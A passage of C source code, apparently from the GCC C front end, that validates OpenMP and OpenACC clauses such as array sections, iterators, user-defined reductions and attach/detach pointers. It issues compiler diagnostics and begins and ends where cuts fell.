T current expression (initially OMP_CLAUSE_DECL), which is either
a TREE_LIST for array-section-subscript (TREE_PURPOSE is low-bound
expression if specified, TREE_VALUE length expression if specified,
TREE_CHAIN is what it has been specified after, or some decl.
TYPES vector is populated with array section types, MAYBE_ZERO_LEN
set to true if any of the array-section-subscript could have length
of zero (explicit or implicit), FIRST_NON_ONE is the index of the
first array-section-subscript which is known not to have length
of one. Given say:
map(a[:b][2:1][:c][:2][:d][e:f][2:5])
FIRST_NON_ONE will be 3, array-section-subscript [:b], [2:1] and [:c]
all are or may have length of 1, array-section-subscript [:2] is the
first one known not to have length 1. For array-section-subscript
<= FIRST_NON_ONE we diagnose non-contiguous arrays if low bound isn't
0 or length isn't the array domain max + 1, for > FIRST_NON_ONE we
can if MAYBE_ZERO_LEN is false. MAYBE_ZERO_LEN will be true in the above
case though, as some lengths could be zero. */
static tree
handle_omp_array_sections_1 (tree c, tree t, vec<tree> &types,
bool &maybe_zero_len, unsigned int &first_non_one,
enum c_omp_region_type ort)
{
tree ret, low_bound, length, type;
if (TREE_CODE (t) != TREE_LIST)
{
if (error_operand_p (t))
return error_mark_node;
ret = t;
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& TYPE_ATOMIC (strip_array_types (TREE_TYPE (t))))
{
error_at (OMP_CLAUSE_LOCATION (c), "%<_Atomic%> %qE in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (TREE_CODE (t) == COMPONENT_REF
&& (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TO
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_FROM))
{
if (DECL_BIT_FIELD (TREE_OPERAND (t, 1)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"bit-field %qE in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
while (TREE_CODE (t) == COMPONENT_REF)
{
if (TREE_CODE (TREE_TYPE (TREE_OPERAND (t, 0))) == UNION_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is a member of a union", t);
return error_mark_node;
}
t = TREE_OPERAND (t, 0);
if (ort == C_ORT_ACC && TREE_CODE (t) == MEM_REF)
{
if (maybe_ne (mem_ref_offset (t), 0))
error_at (OMP_CLAUSE_LOCATION (c),
"cannot dereference %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
t = TREE_OPERAND (t, 0);
}
}
}
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
if (DECL_P (t))
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is not a variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
else if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c), "%<_Atomic%> %qD in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
else if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& VAR_P (t)
&& DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is threadprivate variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
&& TYPE_ATOMIC (TREE_TYPE (t))
&& POINTER_TYPE_P (TREE_TYPE (t)))
{
/* If the array section is pointer based and the pointer
itself is _Atomic qualified, we need to atomically load
the pointer. */
c_expr expr;
memset (&expr, 0, sizeof (expr));
expr.value = ret;
expr = convert_lvalue_to_rvalue (OMP_CLAUSE_LOCATION (c),
expr, false, false);
ret = expr.value;
}
return ret;
}
ret = handle_omp_array_sections_1 (c, TREE_CHAIN (t), types,
maybe_zero_len, first_non_one, ort);
if (ret == error_mark_node || ret == NULL_TREE)
return ret;
type = TREE_TYPE (ret);
low_bound = TREE_PURPOSE (t);
length = TREE_VALUE (t);
if (low_bound == error_mark_node || length == error_mark_node)
return error_mark_node;
if (low_bound && !INTEGRAL_TYPE_P (TREE_TYPE (low_bound)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"low bound %qE of array section does not have integral type",
low_bound);
return error_mark_node;
}
if (length && !INTEGRAL_TYPE_P (TREE_TYPE (length)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"length %qE of array section does not have integral type",
length);
return error_mark_node;
}
if (low_bound
&& TREE_CODE (low_bound) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (low_bound))
> TYPE_PRECISION (sizetype))
low_bound = fold_convert (sizetype, low_bound);
if (length
&& TREE_CODE (length) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (length))
> TYPE_PRECISION (sizetype))
length = fold_convert (sizetype, length);
if (low_bound == NULL_TREE)
low_bound = integer_zero_node;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH))
{
if (length != integer_one_node)
{
error_at (OMP_CLAUSE_LOCATION (c),
"expected single pointer in %qs clause",
c_omp_map_clause_name (c, ort == C_ORT_ACC));
return error_mark_node;
}
}
if (length != NULL_TREE)
{
if (!integer_nonzerop (length))
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
if (integer_zerop (length))
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero length array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
}
else
maybe_zero_len = true;
}
if (first_non_one == types.length ()
&& (TREE_CODE (length) != INTEGER_CST || integer_onep (length)))
first_non_one++;
}
if (TREE_CODE (type) == ARRAY_TYPE)
{
if (length == NULL_TREE
&& (TYPE_DOMAIN (type) == NULL_TREE
|| TYPE_MAX_VALUE (TYPE_DOMAIN (type)) == NULL_TREE))
{
error_at (OMP_CLAUSE_LOCATION (c),
"for unknown bound array type length expression must "
"be specified");
return error_mark_node;
}
if (TREE_CODE (low_bound) == INTEGER_CST
&& tree_int_cst_sgn (low_bound) == -1)
{
error_at (OMP_CLAUSE_LOCATION (c),
"negative low bound in array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (length != NULL_TREE
&& TREE_CODE (length) == INTEGER_CST
&& tree_int_cst_sgn (length) == -1)
{
error_at (OMP_CLAUSE_LOCATION (c),
"negative length in array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (TYPE_DOMAIN (type)
&& TYPE_MAX_VALUE (TYPE_DOMAIN (type))
&& TREE_CODE (TYPE_MAX_VALUE (TYPE_DOMAIN (type)))
== INTEGER_CST)
{
tree size
= fold_convert (sizetype, TYPE_MAX_VALUE (TYPE_DOMAIN (type)));
size = size_binop (PLUS_EXPR, size, size_one_node);
if (TREE_CODE (low_bound) == INTEGER_CST)
{
if (tree_int_cst_lt (size, low_bound))
{
error_at (OMP_CLAUSE_LOCATION (c),
"low bound %qE above array section size "
"in %qs clause", low_bound,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (tree_int_cst_equal (size, low_bound))
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero length array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
maybe_zero_len = true;
}
else if (length == NULL_TREE
&& first_non_one == types.length ()
&& tree_int_cst_equal
(TYPE_MAX_VALUE (TYPE_DOMAIN (type)),
low_bound))
first_non_one++;
}
else if (length == NULL_TREE)
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_IN_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_TASK_REDUCTION)
maybe_zero_len = true;
if (first_non_one == types.length ())
first_non_one++;
}
if (length && TREE_CODE (length) == INTEGER_CST)
{
if (tree_int_cst_lt (size, length))
{
error_at (OMP_CLAUSE_LOCATION (c),
"length %qE above array section size "
"in %qs clause", length,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (TREE_CODE (low_bound) == INTEGER_CST)
{
tree lbpluslen
= size_binop (PLUS_EXPR,
fold_convert (sizetype, low_bound),
fold_convert (sizetype, length));
if (TREE_CODE (lbpluslen) == INTEGER_CST
&& tree_int_cst_lt (size, lbpluslen))
{
error_at (OMP_CLAUSE_LOCATION (c),
"high bound %qE above array section size "
"in %qs clause", lbpluslen,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
}
}
}
else if (length == NULL_TREE)
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_IN_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_TASK_REDUCTION)
maybe_zero_len = true;
if (first_non_one == types.length ())
first_non_one++;
}
/* For [lb:] we will need to evaluate lb more than once. */
if (length == NULL_TREE && OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND)
{
tree lb = save_expr (low_bound);
if (lb != low_bound)
{
TREE_PURPOSE (t) = lb;
low_bound = lb;
}
}
}
else if (TREE_CODE (type) == POINTER_TYPE)
{
if (length == NULL_TREE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"for pointer type length expression must be specified");
return error_mark_node;
}
if (length != NULL_TREE
&& TREE_CODE (length) == INTEGER_CST
&& tree_int_cst_sgn (length) == -1)
{
error_at (OMP_CLAUSE_LOCATION (c),
"negative length in array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
/* If there is a pointer type anywhere but in the very first
array-section-subscript, the array section can't be contiguous. */
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& TREE_CODE (TREE_CHAIN (t)) == TREE_LIST)
{
error_at (OMP_CLAUSE_LOCATION (c),
"array section is not contiguous in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
}
else
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE does not have pointer or array type", ret);
return error_mark_node;
}
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND)
types.safe_push (TREE_TYPE (ret));
/* We will need to evaluate lb more than once. */
tree lb = save_expr (low_bound);
if (lb != low_bound)
{
TREE_PURPOSE (t) = lb;
low_bound = lb;
}
ret = build_array_ref (OMP_CLAUSE_LOCATION (c), ret, low_bound);
return ret;
}
/* Handle array sections for clause C. */
static bool
handle_omp_array_sections (tree c, enum c_omp_region_type ort)
{
bool maybe_zero_len = false;
unsigned int first_non_one = 0;
auto_vec<tree, 10> types;
tree *tp = &OMP_CLAUSE_DECL (c);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
&& TREE_CODE (*tp) == TREE_LIST
&& TREE_PURPOSE (*tp)
&& TREE_CODE (TREE_PURPOSE (*tp)) == TREE_VEC)
tp = &TREE_VALUE (*tp);
tree first = handle_omp_array_sections_1 (c, *tp, types,
maybe_zero_len, first_non_one,
ort);
if (first == error_mark_node)
return true;
if (first == NULL_TREE)
return false;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND)
{
tree t = *tp;
tree tem = NULL_TREE;
/* Need to evaluate side effects in the length expressions
if any. */
while (TREE_CODE (t) == TREE_LIST)
{
if (TREE_VALUE (t) && TREE_SIDE_EFFECTS (TREE_VALUE (t)))
{
if (tem == NULL_TREE)
tem = TREE_VALUE (t);
else
tem = build2 (COMPOUND_EXPR, TREE_TYPE (tem),
TREE_VALUE (t), tem);
}
t = TREE_CHAIN (t);
}
if (tem)
first = build2 (COMPOUND_EXPR, TREE_TYPE (first), tem, first);
first = c_fully_fold (first, false, NULL, true);
*tp = first;
}
else
{
unsigned int num = types.length (), i;
tree t, side_effects = NULL_TREE, size = NULL_TREE;
tree condition = NULL_TREE;
if (int_size_in_bytes (TREE_TYPE (first)) <= 0)
maybe_zero_len = true;
for (i = num, t = OMP_CLAUSE_DECL (c); i > 0;
t = TREE_CHAIN (t))
{
tree low_bound = TREE_PURPOSE (t);
tree length = TREE_VALUE (t);
i--;
if (low_bound
&& TREE_CODE (low_bound) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (low_bound))
> TYPE_PRECISION (sizetype))
low_bound = fold_convert (sizetype, low_bound);
if (length
&& TREE_CODE (length) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (length))
> TYPE_PRECISION (sizetype))
length = fold_convert (sizetype, length);
if (low_bound == NULL_TREE)
low_bound = integer_zero_node;
if (!maybe_zero_len && i > first_non_one)
{
if (integer_nonzerop (low_bound))
goto do_warn_noncontiguous;
if (length != NULL_TREE
&& TREE_CODE (length) == INTEGER_CST
&& TYPE_DOMAIN (types[i])
&& TYPE_MAX_VALUE (TYPE_DOMAIN (types[i]))
&& TREE_CODE (TYPE_MAX_VALUE (TYPE_DOMAIN (types[i])))
== INTEGER_CST)
{
tree size;
size = size_binop (PLUS_EXPR,
TYPE_MAX_VALUE (TYPE_DOMAIN (types[i])),
size_one_node);
if (!tree_int_cst_equal (length, size))
{
do_warn_noncontiguous:
error_at (OMP_CLAUSE_LOCATION (c),
"array section is not contiguous in %qs "
"clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return true;
}
}
if (length != NULL_TREE
&& TREE_SIDE_EFFECTS (length))
{
if (side_effects == NULL_TREE)
side_effects = length;
else
side_effects = build2 (COMPOUND_EXPR,
TREE_TYPE (side_effects),
length, side_effects);
}
}
else
{
tree l;
if (i > first_non_one
&& ((length && integer_nonzerop (length))
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION))
continue;
if (length)
l = fold_convert (sizetype, length);
else
{
l = size_binop (PLUS_EXPR,
TYPE_MAX_VALUE (TYPE_DOMAIN (types[i])),
size_one_node);
l = size_binop (MINUS_EXPR, l,
fold_convert (sizetype, low_bound));
}
if (i > first_non_one)
{
l = fold_build2 (NE_EXPR, boolean_type_node, l,
size_zero_node);
if (condition == NULL_TREE)
condition = l;
else
condition = fold_build2 (BIT_AND_EXPR, boolean_type_node,
l, condition);
}
else if (size == NULL_TREE)
{
size = size_in_bytes (TREE_TYPE (types[i]));
tree eltype = TREE_TYPE (types[num - 1]);
while (TREE_CODE (eltype) == ARRAY_TYPE)
eltype = TREE_TYPE (eltype);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
if (integer_zerop (size)
|| integer_zerop (size_in_bytes (eltype)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero length array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
size = size_binop (EXACT_DIV_EXPR, size,
size_in_bytes (eltype));
}
size = size_binop (MULT_EXPR, size, l);
if (condition)
size = fold_build3 (COND_EXPR, sizetype, condition,
size, size_zero_node);
}
else
size = size_binop (MULT_EXPR, size, l);
}
}
if (side_effects)
size = build2 (COMPOUND_EXPR, sizetype, side_effects, size);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
size = size_binop (MINUS_EXPR, size, size_one_node);
size = c_fully_fold (size, false, NULL);
size = save_expr (size);
tree index_type = build_index_type (size);
tree eltype = TREE_TYPE (first);
while (TREE_CODE (eltype) == ARRAY_TYPE)
eltype = TREE_TYPE (eltype);
tree type = build_array_type (eltype, index_type);
tree ptype = build_pointer_type (eltype);
if (TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE)
t = build_fold_addr_expr (t);
tree t2 = build_fold_addr_expr (first);
t2 = fold_convert_loc (OMP_CLAUSE_LOCATION (c),
ptrdiff_type_node, t2);
t2 = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
ptrdiff_type_node, t2,
fold_convert_loc (OMP_CLAUSE_LOCATION (c),
ptrdiff_type_node, t));
t2 = c_fully_fold (t2, false, NULL);
if (tree_fits_shwi_p (t2))
t = build2 (MEM_REF, type, t,
build_int_cst (ptype, tree_to_shwi (t2)));
else
{
t2 = fold_convert_loc (OMP_CLAUSE_LOCATION (c), sizetype, t2);
t = build2_loc (OMP_CLAUSE_LOCATION (c), POINTER_PLUS_EXPR,
TREE_TYPE (t), t, t2);
t = build2 (MEM_REF, type, t, build_int_cst (ptype, 0));
}
OMP_CLAUSE_DECL (c) = t;
return false;
}
first = c_fully_fold (first, false, NULL);
OMP_CLAUSE_DECL (c) = first;
if (size)
size = c_fully_fold (size, false, NULL);
OMP_CLAUSE_SIZE (c) = size;
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP
|| (TREE_CODE (t) == COMPONENT_REF
&& TREE_CODE (TREE_TYPE (t)) == ARRAY_TYPE))
return false;
gcc_assert (OMP_CLAUSE_MAP_KIND (c) != GOMP_MAP_FORCE_DEVICEPTR);
if (ort == C_ORT_OMP || ort == C_ORT_ACC)
switch (OMP_CLAUSE_MAP_KIND (c))
{
case GOMP_MAP_ALLOC:
case GOMP_MAP_IF_PRESENT:
case GOMP_MAP_TO:
case GOMP_MAP_FROM:
case GOMP_MAP_TOFROM:
case GOMP_MAP_ALWAYS_TO:
case GOMP_MAP_ALWAYS_FROM:
case GOMP_MAP_ALWAYS_TOFROM:
case GOMP_MAP_RELEASE:
case GOMP_MAP_DELETE:
case GOMP_MAP_FORCE_TO:
case GOMP_MAP_FORCE_FROM:
case GOMP_MAP_FORCE_TOFROM:
case GOMP_MAP_FORCE_PRESENT:
OMP_CLAUSE_MAP_MAYBE_ZERO_LENGTH_ARRAY_SECTION (c) = 1;
break;
default:
break;
}
tree c2 = build_omp_clause (OMP_CLAUSE_LOCATION (c), OMP_CLAUSE_MAP);
if (ort != C_ORT_OMP && ort != C_ORT_ACC)
OMP_CLAUSE_SET_MAP_KIND (c2, GOMP_MAP_POINTER);
else if (TREE_CODE (t) == COMPONENT_REF)
{
gomp_map_kind k = (ort == C_ORT_ACC) ? GOMP_MAP_ATTACH_DETACH
: GOMP_MAP_ALWAYS_POINTER;
OMP_CLAUSE_SET_MAP_KIND (c2, k);
}
else
OMP_CLAUSE_SET_MAP_KIND (c2, GOMP_MAP_FIRSTPRIVATE_POINTER);
if (OMP_CLAUSE_MAP_KIND (c2) != GOMP_MAP_FIRSTPRIVATE_POINTER
&& !c_mark_addressable (t))
return false;
OMP_CLAUSE_DECL (c2) = t;
t = build_fold_addr_expr (first);
t = fold_convert_loc (OMP_CLAUSE_LOCATION (c), ptrdiff_type_node, t);
tree ptr = OMP_CLAUSE_DECL (c2);
if (!POINTER_TYPE_P (TREE_TYPE (ptr)))
ptr = build_fold_addr_expr (ptr);
t = fold_build2_loc (OMP_CLAUSE_LOCATION (c), MINUS_EXPR,
ptrdiff_type_node, t,
fold_convert_loc (OMP_CLAUSE_LOCATION (c),
ptrdiff_type_node, ptr));
t = c_fully_fold (t, false, NULL);
OMP_CLAUSE_SIZE (c2) = t;
OMP_CLAUSE_CHAIN (c2) = OMP_CLAUSE_CHAIN (c);
OMP_CLAUSE_CHAIN (c) = c2;
}
return false;
}
/* Helper function of finish_omp_clauses. Clone STMT as if we were making
an inline call. But, remap
the OMP_DECL1 VAR_DECL (omp_out resp. omp_orig) to PLACEHOLDER
and OMP_DECL2 VAR_DECL (omp_in resp. omp_priv) to DECL. */
static tree
c_clone_omp_udr (tree stmt, tree omp_decl1, tree omp_decl2,
tree decl, tree placeholder)
{
copy_body_data id;
hash_map<tree, tree> decl_map;
decl_map.put (omp_decl1, placeholder);
decl_map.put (omp_decl2, decl);
memset (&id, 0, sizeof (id));
id.src_fn = DECL_CONTEXT (omp_decl1);
id.dst_fn = current_function_decl;
id.src_cfun = DECL_STRUCT_FUNCTION (id.src_fn);
id.decl_map = &decl_map;
id.copy_decl = copy_decl_no_change;
id.transform_call_graph_edges = CB_CGE_DUPLICATE;
id.transform_new_cfg = true;
id.transform_return_to_modify = false;
id.transform_lang_insert_block = NULL;
id.eh_lp_nr = 0;
walk_tree (&stmt, copy_tree_body_r, &id, NULL);
return stmt;
}
/* Helper function of c_finish_omp_clauses, called via walk_tree.
Find OMP_CLAUSE_PLACEHOLDER (passed in DATA) in *TP. */
static tree
c_find_omp_placeholder_r (tree *tp, int *, void *data)
{
if (*tp == (tree) data)
return *tp;
return NULL_TREE;
}
/* Similarly, but also walk aggregate fields. */
struct c_find_omp_var_s { tree var; hash_set<tree> *pset; };
static tree
c_find_omp_var_r (tree *tp, int *, void *data)
{
if (*tp == ((struct c_find_omp_var_s *) data)->var)
return *tp;
if (RECORD_OR_UNION_TYPE_P (*tp))
{
tree field;
hash_set<tree> *pset = ((struct c_find_omp_var_s *) data)->pset;
for (field = TYPE_FIELDS (*tp); field;
field = DECL_CHAIN (field))
if (TREE_CODE (field) == FIELD_DECL)
{
tree ret = walk_tree (&DECL_FIELD_OFFSET (field),
c_find_omp_var_r, data, pset);
if (ret)
return ret;
ret = walk_tree (&DECL_SIZE (field), c_find_omp_var_r, data, pset);
if (ret)
return ret;
ret = walk_tree (&DECL_SIZE_UNIT (field), c_find_omp_var_r, data,
pset);
if (ret)
return ret;
ret = walk_tree (&TREE_TYPE (field), c_find_omp_var_r, data, pset);
if (ret)
return ret;
}
}
else if (INTEGRAL_TYPE_P (*tp))
return walk_tree (&TYPE_MAX_VALUE (*tp), c_find_omp_var_r, data,
((struct c_find_omp_var_s *) data)->pset);
return NULL_TREE;
}
/* Finish OpenMP iterators ITER. Return true if they are errorneous
and clauses containing them should be removed. */
static bool
c_omp_finish_iterators (tree iter)
{
bool ret = false;
for (tree it = iter; it; it = TREE_CHAIN (it))
{
tree var = TREE_VEC_ELT (it, 0);
tree begin = TREE_VEC_ELT (it, 1);
tree end = TREE_VEC_ELT (it, 2);
tree step = TREE_VEC_ELT (it, 3);
tree orig_step;
tree type = TREE_TYPE (var);
location_t loc = DECL_SOURCE_LOCATION (var);
if (type == error_mark_node)
{
ret = true;
continue;
}
if (!INTEGRAL_TYPE_P (type) && !POINTER_TYPE_P (type))
{
error_at (loc, "iterator %qD has neither integral nor pointer type",
var);
ret = true;
continue;
}
else if (TYPE_ATOMIC (type))
{
error_at (loc, "iterator %qD has %<_Atomic%> qualified type", var);
ret = true;
continue;
}
else if (TYPE_READONLY (type))
{
error_at (loc, "iterator %qD has const qualified type", var);
ret = true;
continue;
}
else if (step == error_mark_node
|| TREE_TYPE (step) == error_mark_node)
{
ret = true;
continue;
}
else if (!INTEGRAL_TYPE_P (TREE_TYPE (step)))
{
error_at (EXPR_LOC_OR_LOC (step, loc),
"iterator step with non-integral type");
ret = true;
continue;
}
begin = c_fully_fold (build_c_cast (loc, type, begin), false, NULL);
end = c_fully_fold (build_c_cast (loc, type, end), false, NULL);
orig_step = save_expr (c_fully_fold (step, false, NULL));
tree stype = POINTER_TYPE_P (type) ? sizetype : type;
step = c_fully_fold (build_c_cast (loc, stype, orig_step), false, NULL);
if (POINTER_TYPE_P (type))
{
begin = save_expr (begin);
step = pointer_int_sum (loc, PLUS_EXPR, begin, step);
step = fold_build2_loc (loc, MINUS_EXPR, sizetype,
fold_convert (sizetype, step),
fold_convert (sizetype, begin));
step = fold_convert (ssizetype, step);
}
if (integer_zerop (step))
{
error_at (loc, "iterator %qD has zero step", var);
ret = true;
continue;
}
if (begin == error_mark_node
|| end == error_mark_node
|| step == error_mark_node
|| orig_step == error_mark_node)
{
ret = true;
continue;
}
hash_set<tree> pset;
tree it2;
for (it2 = TREE_CHAIN (it); it2; it2 = TREE_CHAIN (it2))
{
tree var2 = TREE_VEC_ELT (it2, 0);
tree begin2 = TREE_VEC_ELT (it2, 1);
tree end2 = TREE_VEC_ELT (it2, 2);
tree step2 = TREE_VEC_ELT (it2, 3);
tree type2 = TREE_TYPE (var2);
location_t loc2 = DECL_SOURCE_LOCATION (var2);
struct c_find_omp_var_s data = { var, &pset };
if (walk_tree (&type2, c_find_omp_var_r, &data, &pset))
{
error_at (loc2,
"type of iterator %qD refers to outer iterator %qD",
var2, var);
break;
}
else if (walk_tree (&begin2, c_find_omp_var_r, &data, &pset))
{
error_at (EXPR_LOC_OR_LOC (begin2, loc2),
"begin expression refers to outer iterator %qD", var);
break;
}
else if (walk_tree (&end2, c_find_omp_var_r, &data, &pset))
{
error_at (EXPR_LOC_OR_LOC (end2, loc2),
"end expression refers to outer iterator %qD", var);
break;
}
else if (walk_tree (&step2, c_find_omp_var_r, &data, &pset))
{
error_at (EXPR_LOC_OR_LOC (step2, loc2),
"step expression refers to outer iterator %qD", var);
break;
}
}
if (it2)
{
ret = true;
continue;
}
TREE_VEC_ELT (it, 1) = begin;
TREE_VEC_ELT (it, 2) = end;
TREE_VEC_ELT (it, 3) = step;
TREE_VEC_ELT (it, 4) = orig_step;
}
return ret;
}
/* Ensure that pointers are used in OpenACC attach and detach clauses.
Return true if an error has been detected. */
static bool
c_oacc_check_attachments (tree c)
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_MAP)
return false;
/* OpenACC attach / detach clauses must be pointers. */
if (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH)
{
tree t = OMP_CLAUSE_DECL (c);
while (TREE_CODE (t) == TREE_LIST)
t = TREE_CHAIN (t);
if (TREE_CODE (TREE_TYPE (t)) != POINTER_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c), "expected pointer in %qs clause",
c_omp_map_clause_name (c, true));
return true;
}
}
return false;
}
/* For all elements of CLAUSES, validate them against their constraints.
Remove any elements from the list that are invalid. */
tree
c_finish_omp_clauses (tree clauses, enum c_omp_region_type ort)
{
bitmap_head generic_head, firstprivate_head, lastprivate_head;
bitmap_head aligned_head, map_head, map_field_head, oacc_reduction_head;
tree c, t, type, *pc;
tree simdlen = NULL_TREE, safelen = NULL_TREE;
bool branch_seen = false;
bool copyprivate_seen = false;
bool linear_variable_step_check = false;
tree *nowait_clause = NULL;
tree ordered_clause = NULL_TREE;
tree schedule_clause = NULL_TREE;
bool oacc_async = false;
tree last_iterators = NULL_TREE;
bool last_iterators_remove = false;
tree *nogroup_seen = NULL;
tree *order_clause = NULL;
/* 1 if normal/task reduction has been seen, -1 if inscan reduction
has been seen, -2 if mixed inscan/normal reduction diagnosed. */
int reduction_seen = 0;
bitmap_obstack_initialize (NULL);
bitmap_initialize (&generic_head, &bitmap_default_obstack);
bitmap_initialize (&firstprivate_head, &bitmap_default_obstack);
bitmap_initialize (&lastprivate_head, &bitmap_default_obstack);
bitmap_initialize (&aligned_head, &bitmap_default_obstack);
/* If ort == C_ORT_OMP_DECLARE_SIMD used as uniform_head instead. */
bitmap_initialize (&map_head, &bitmap_default_obstack);
bitmap_initialize (&map_field_head, &bitmap_default_obstack);
/* If ort == C_ORT_OMP used as nontemporal_head or use_device_xxx_head
instead. */
bitmap_initialize (&oacc_reduction_head, &bitmap_default_obstack);
if (ort & C_ORT_ACC)
for (c = clauses; c; c = OMP_CLAUSE_CHAIN (c))
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_ASYNC)
{
oacc_async = true;
break;
}
for (pc = &clauses, c = clauses; c ; c = *pc)
{
bool remove = false;
bool need_complete = false;
bool need_implicitly_determined = false;
switch (OMP_CLAUSE_CODE (c))
{
case OMP_CLAUSE_SHARED:
need_implicitly_determined = true;
goto check_dup_generic;
case OMP_CLAUSE_PRIVATE:
need_complete = true;
need_implicitly_determined = true;
goto check_dup_generic;
case OMP_CLAUSE_REDUCTION:
if (reduction_seen == 0)
reduction_seen = OMP_CLAUSE_REDUCTION_INSCAN (c) ? -1 : 1;
else if (reduction_seen != -2
&& reduction_seen != (OMP_CLAUSE_REDUCTION_INSCAN (c)
? -1 : 1))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<inscan%> and non-%<inscan%> %<reduction%> clauses "
"on the same construct");
reduction_seen = -2;
}
/* FALLTHRU */
case OMP_CLAUSE_IN_REDUCTION:
case OMP_CLAUSE_TASK_REDUCTION:
need_implicitly_determined = true;
